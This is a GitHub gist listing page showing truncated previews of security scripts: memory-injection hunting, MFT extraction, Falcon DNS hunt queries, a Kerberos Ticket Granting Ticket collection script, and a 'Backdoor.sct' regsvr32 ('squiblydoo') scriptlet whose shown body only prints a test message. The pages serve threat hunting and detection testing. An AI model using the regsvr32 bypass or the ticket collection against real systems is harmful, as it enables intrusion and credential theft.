@cbresponse
cbresponse / test.ps1
Last active August 18, 2018 05:39
dsddddssfsf3rwfscsv
Powershell.exe get-process
function Export-MFT {
<#
.SYNOPSIS
Extracts master file table from volume.
Version: 0.1
Author : Jesse Davis (@secabstraction)
License: BSD 3-Clause
.DESCRIPTION
@cbresponse
cbresponse / Get-InjectedThread.ps1
Created June 18, 2018 12:55 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@cbresponse
cbresponse / Backdoor.sct
Last active June 23, 2018 07:43 — forked from api0cradle/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
function WriteMessage()
{
Write-Host "This is a test PowerShell Script that does no harm at all" -ForegroundColor Green -BackgroundColor DarkGray
}
WriteMessage
@cbresponse
cbresponse / Get-KerberosTicketGrantingTicket.ps1
Created June 29, 2019 05:21 — forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Ticket Granting Tickets from all Logon Sessions
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
@cbresponse
cbresponse / FalconHuntqueries.md
Created January 5, 2021 10:13 — forked from ag-michael/FalconHuntqueries.md
Falcon hunt queries

timestamp convert:

convert ctime(timestamp/1000)

.top, .club, .xyz, .ru domain lookups where the number of lookups for the domain is more than 1 and less than 4 per computer:

aid=* event_simpleName=DnsRequest | regex DomainName=".*\.top$|.*\.club$|.*\.xyz$|.*\.ru$|[0-9]+.*\.\w$" | stats values(ComputerName) count by DomainName | where count <4 | sort - count